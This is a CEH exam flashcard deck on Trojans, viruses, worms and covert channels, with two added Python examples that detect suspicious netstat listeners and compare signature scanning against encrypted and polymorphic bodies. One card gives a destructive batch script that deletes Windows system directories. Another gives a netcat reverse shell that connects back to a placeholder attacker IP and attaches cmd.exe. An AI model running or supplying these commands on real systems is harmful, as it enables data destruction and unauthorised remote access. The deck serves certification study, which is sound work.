Chapter 8: Trojans, Viruses, Worms, & Covert Channels Flashcards Preview

CEH - Certified Ethical Hacker > Chapter 8: Trojans, Viruses, Worms, & Covert Channels > Flashcards

Flashcards in Chapter 8: Trojans, Viruses, Worms, & Covert Channels Deck (21)
1
Q

Malware

A

short for malicious software

a term that covers viruses, worms, Trojans, logic bombs, adware, & spyware

designed to perform malicious & disruptive actions; any type of software that performs actions without the consent or knowledge of the system owner & results in disruptive action(s)

2
Q

Covert channels

A

unknown or unmonitored parts of a system that can be exploited to move information or gain access without the transfer being seen by the system's normal controls

3
Q

Malware & the Law (3)

A

THE COMPUTER FRAUD & ABUSE ACT (CFAA) - addresses federal computer-related offenses

THE PATRIOT ACT - penalties of up to 10 years for a 1st offense & 20 years for a 2nd offense; damage to multiple systems over the course of a year is added together to determine whether it exceeds $5,000

CAN-SPAM ACT - regulates commercial e-mail; designed to stop spam

4
Q

Categories of Malware

A

VIRUSES - self-replicating code that attaches itself to executables; typically requires a user action to initiate infection

WORMS - successor to viruses; entirely self-replicating & spread quickly without any action by the user; can spread across networks, crashing routers & consuming bandwidth & resources

TROJAN HORSES - provide covert access to a system; look harmless; goals are similar to worms & viruses, but information is transmitted back to the attacker & they are more stealthy

ROOTKITS - hide within the core components of a system (kernel, drivers, boot code); very difficult to detect

SPYWARE - collects & forwards information about a system or the user's activities in a stealthy manner; the most common form is the keylogger

ADWARE - replaces home pages in browsers, places pop-up ads, or installs items on a system to advertise a product or service

5
Q

Designing a Virus (6)

A

1) DESIGN - envision & create virus
2) REPLICATION - once deployed, virus spreads through replication
3) LAUNCH - virus carries out task for which it was created
4) DETECTION - virus becomes recognized, antivirus makers investigate
5) INCORPORATION - antivirus makers determine a way to identify the virus & incorporate remediation into their product updates
6) ELIMINATION - users of antivirus products incorporate updates & eliminate virus

6
Q

Kinds of Viruses (12)

A

1) SYSTEM/BOOT SECTOR VIRUS - code placed in the MBR (master boot record); the boot sequence is altered; can make the hard drive appear missing, etc.
2) MACRO VIRUSES - take advantage of the embedded scripting languages in documents (Word, Excel, etc.); designed to hide in those files & change configurations
3) CLUSTER VIRUSES - alter the file-allocation table so that file entries point to the virus instead of the real file
4) STEALTH/TUNNELING VIRUS - uses various mechanisms (intercepting disk & OS calls) to evade detection systems
5) ENCRYPTION VIRUSES - encrypt their own body with a key that changes from copy to copy & carry a small decryptor, so the stored bytes differ between infections & no fixed signature matches the body
6) CAVITY/FILE-OVERWRITING VIRUSES - write themselves into unused space inside the host file, so the file's size & appearance do not change
7) SPARSE-INFECTOR VIRUSES - avoid detection by carrying out infectious actions sporadically, or only on files of a certain length or type, etc.
8) COMPANION/CAMOUFLAGE VIRUS - creates a file with the same name as a legitimate program but a different extension that the OS searches first (e.g. if you run program.exe, the virus creates program.com, which is executed instead)
9) LOGIC BOMB - lies dormant until a predetermined event or condition occurs; separated into two parts, payload & trigger
10) FILE/MULTIPARTITE VIRUS - infects in multiple ways using multiple attack vectors (e.g. boot sector & files)
11) SHELL VIRUSES - wrap themselves around the target application's code, so the virus runs first & then hands control to the original program
12) CRYPTOVIRUSES - encrypt certain files; the victim is notified to contact the virus creator & pay a specific amount (ransom)

7
Q

Hoax

A

tricks the user into taking an action (deleting files, forwarding warnings) when no real infection exists; not really a virus, but can be just as damaging

8
Q

Creating a virus

A

Do not execute this code because it could cause a lot of damage

1) Create a batch file called virus.bat using Notepad

2) Enter the following code (deletes the Windows system directory & then the Windows directory):
@echo off
del c:\windows\system\*.*
del c:\windows\*.*

3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com

Another way is to use a GUI builder such as JPS Virus Maker or TeraBIT Virus Maker 2.8 SE

9
Q

Sheep dip system

A

used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; the computer is stripped down & includes only the services & apps needed to test the software, so nothing else on it can be infected or leak data

10
Q

Methods of Spyware infection

A

1) P2P file sharing
2) IM - instant messaging
3) IRC - internet relay chat
4) E-mail attachments
5) Physical access
6) Browser defects - browsers left unpatched
7) Freeware - downloading free software from unknown sources
8) Websites - drive-by installs
9) Software installs - the victim downloads legitimate-looking software, but packaged with it is a payload that is silently installed in the background

11
Q

What are the two items Trojans rely on?

A

1) OVERT CHANNEL - a legitimate communication path or channel used, as intended, to send information or perform other actions; HTTP & TCP/IP are examples used to send information
2) COVERT CHANNEL - a path used to transmit information in a way that is supposed to be impossible, or that uses a process or protocol in a way it was not intended to be used, so that the transfer is not noticed

12
Q

Types of Trojans

A

1) RATs (REMOTE ACCESS TROJANS) - give the attacker remote control over the system
2) DATA SENDING - transmit captured data (keystrokes, passwords, files) back to the attacker
3) DESTRUCTIVE - seek to corrupt, erase, or destroy data on the system (could affect hardware too)
4) PROXY - the attacker hides behind the target's system while doing malicious things to another system
5) FTP - the infected host becomes a server hosting all kinds of information
6) SECURITY SOFTWARE DISABLERS - shut down or cripple antivirus, firewalls, or other defenses

13
Q

Detecting Trojans & Viruses

A

Trojans provide access through backdoors or covert channels, so a port must be open (listening) to allow this communication.

Port scanning & local socket listing are used to detect them; tools such as nmap (remote scan) & netstat (local listing)

14
Q

Using Netstat

Using TCPview

A

NETSTAT
Used to list open ports & the connections/listeners on the system;

1) cmd: netstat -an

//CON: a snapshot, not real-time

TCPView //an executable file
Tracks port usage in real time
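The netstat check above is a manual read of a port listing; the block below is an added example (not from the page or any CEH lab) that does the same triage in code over a constructed `netstat -an` sample in the Windows layout. EXPECTED_LISTENERS is an assumed baseline for a hypothetical workstation, and the sample text, addresses and port numbers are all made up for the demonstration.

```python
"""Find Trojan-style listeners and odd outbound sessions in `netstat -an` output.

Added example (not from the page): the netstat text is constructed,
and EXPECTED_LISTENERS is an assumed baseline for a hypothetical host.
"""
import re
from typing import List, NamedTuple, Tuple

# Assumed baseline: TCP ports this host is supposed to have listening.
EXPECTED_LISTENERS = {135, 139, 445, 3389}

# Constructed sample in the Windows `netstat -an` layout; not a real capture.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    192.168.1.10:49732     203.0.113.5:80         ESTABLISHED
  TCP    192.168.1.10:49811     198.51.100.7:31337     ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""


class Socket(NamedTuple):
    proto: str
    local_ip: str
    local_port: int
    remote: str
    state: str        # empty for UDP rows, which carry no state column


# proto, local ip, local port, foreign address, optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text: str) -> List[Socket]:
    """Turn netstat rows into Socket records; header and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, lip, lport, remote, state = m.groups()
        sockets.append(Socket(proto, lip, int(lport), remote, state or ""))
    return sockets


def unexpected_listeners(sockets: List[Socket], expected=EXPECTED_LISTENERS) -> List[int]:
    """TCP ports in LISTENING state that are not in the baseline: backdoor candidates."""
    return sorted(s.local_port for s in sockets
                  if s.proto == "TCP" and s.state == "LISTENING"
                  and s.local_port not in expected)


def suspicious_outbound(sockets: List[Socket], max_well_known=1024) -> List[Tuple[str, int]]:
    """ESTABLISHED sessions to a remote port above the well-known range,
    the pattern of a reverse-connecting Trojan or RAT talking to its handler."""
    hits = []
    for s in sockets:
        if s.state != "ESTABLISHED":
            continue
        rip, _, rport = s.remote.rpartition(":")   # handles [::]:port too
        if int(rport) > max_well_known:
            hits.append((rip, int(rport)))
    return hits


if __name__ == "__main__":
    socks = parse_netstat(SAMPLE_NETSTAT)
    print("unexpected listeners:", unexpected_listeners(socks))
    print("suspicious outbound :", suspicious_outbound(socks))
```

On a real host, replace SAMPLE_NETSTAT with the output of `netstat -an` (or `netstat -ano` to get the owning PID), and keep the baseline in a file you control rather than in the script; the snapshot limitation from the card still applies, so run it repeatedly or pair it with TCPView.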

15
Q

TCP vs UDP when choosing protocol to run open port for access to system

A

the typical choice is a TCP port because it is more robust (connection-oriented, reliable delivery)

UDP is typically chosen when the goal is to traverse a firewall or security architecture that filters TCP more strictly

16
Q

What port is generally open?

A

80 (HTTP), because web traffic is allowed through almost every firewall

17
Q

Using BO2K

A

used to build a server component & install that server on the victim's computer to gain access

the BO2K server executable needs to be run on the target system; it runs as an executable called Umgr32.exe, which may be masked as a different process in Task Manager; if stealth was not configured, the app appears as Remote Administration Service

18
Q

Distributing Trojans

A

WRAPPERS - take the payload & merge it with a harmless executable, so the victim runs both when launching the harmless-looking program

19
Q

Using Netcat

A

Command-line utility used to read & write data over TCP or UDP connections & do port redirection

1) nc -n -v -l -p 80 //on the hacker's system: set up a listener on port 80
2) nc -n HACKERS_IP 80 -e cmd.exe //on the victim: connect back to the hacker's system & attach cmd.exe to the connection
3) Now the hacker has a command shell on the victim's system

Netcat can also do port scanning & place files on the target system

nc -v -z -w1 IP_address first_port-last_port
//used to scan ports (-z: no data sent, -w1: 1-second timeout)

20
Q

Polymorphic Virus

A

rewrites itself each generation (mutates its own code, including the decryptor) & hides the payload, so no two copies share a fixed byte signature
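Card 6's encryption virus and this card's polymorphic virus differ in what a byte-signature scanner can still match. The block below is an added example (not from the page or any CEH material) that makes the difference concrete with a toy XOR "cipher": BODY is a constructed stand-in byte string, STUB_TOKENS is a made-up decryptor "instruction" list, and the junk tokens stand in for the semantically empty instructions a polymorphic engine splices in. It goes slightly beyond the card by also showing why scanners emulate the decryptor instead of matching raw bytes.

```python
"""Encrypted vs. polymorphic virus bodies against a signature scanner.

Added example (not from the page). BODY is a constructed stand-in byte
string, STUB_TOKENS is a made-up decryptor "instruction" list, and the
XOR cipher is a toy; the point is what a byte-signature scanner can and
cannot match.
"""
import random

BODY = b"<<constructed stand-in for a virus body: copies itself into .exe files>>"
BODY_SIGNATURE = BODY[2:22]          # what a scanner would key on in the plain body

STUB_TOKENS = [b"LOAD_KEY", b"XOR_LOOP", b"JUMP_BODY"]   # hypothetical decryptor
STUB_SIGNATURE = b";".join(STUB_TOKENS)                  # constant stub bytes
JUNK = [b"NOP", b"MOV_A_A", b"PUSH_POP"]                 # semantically empty filler


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_encrypted(body: bytes = BODY, key: int = 0x5A) -> bytes:
    """Encryption virus: constant decryptor stub, body XORed with a per-copy key.
    Layout: stub 0x00 key ciphertext (the stub is ASCII, so 0x00 delimits it)."""
    return STUB_SIGNATURE + b"\x00" + bytes([key]) + xor(body, key)


def make_polymorphic(body: bytes = BODY, key: int = 0x5A, seed=None) -> bytes:
    """Polymorphic virus: the decryptor is rewritten per generation too, with
    junk instructions spliced between the real ones, so neither the body nor
    the stub carries a fixed byte pattern."""
    rng = random.Random(seed)
    parts = []
    for tok in STUB_TOKENS:
        parts.append(tok)
        parts.extend(rng.choice(JUNK) for _ in range(rng.randint(1, 3)))
    return b";".join(parts) + b"\x00" + bytes([key]) + xor(body, key)


def static_scan(sample: bytes) -> dict:
    """Plain signature scanner: raw byte match, no execution.
    The encrypted body never matches; only a constant stub can."""
    return {"body": BODY_SIGNATURE in sample, "stub": STUB_SIGNATURE in sample}


def emulate_and_scan(sample: bytes) -> bool:
    """Emulating scanner: 'run' the decryptor (parse the framing, undo the XOR),
    then look for the body signature in the decrypted bytes."""
    stub, _, rest = sample.partition(b"\x00")
    key, ciphertext = rest[0], rest[1:]
    return BODY_SIGNATURE in xor(ciphertext, key)


if __name__ == "__main__":
    for name, sample in (("encrypted", make_encrypted()),
                         ("polymorphic", make_polymorphic(seed=7))):
        print(name, "static:", static_scan(sample),
              "emulated:", emulate_and_scan(sample))
```

Static scanning finds the encrypted virus only through its unchanging stub; once the stub is mutated as well (the polymorphic case) nothing in the file is constant, which is why real scanners run the decryptor in an emulator and scan the result rather than relying on raw byte signatures.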

21
Q

Sparse infector virus

A

infects files selectively (e.g. only every nth execution, or only files of a given size or type) to limit its footprint & avoid detection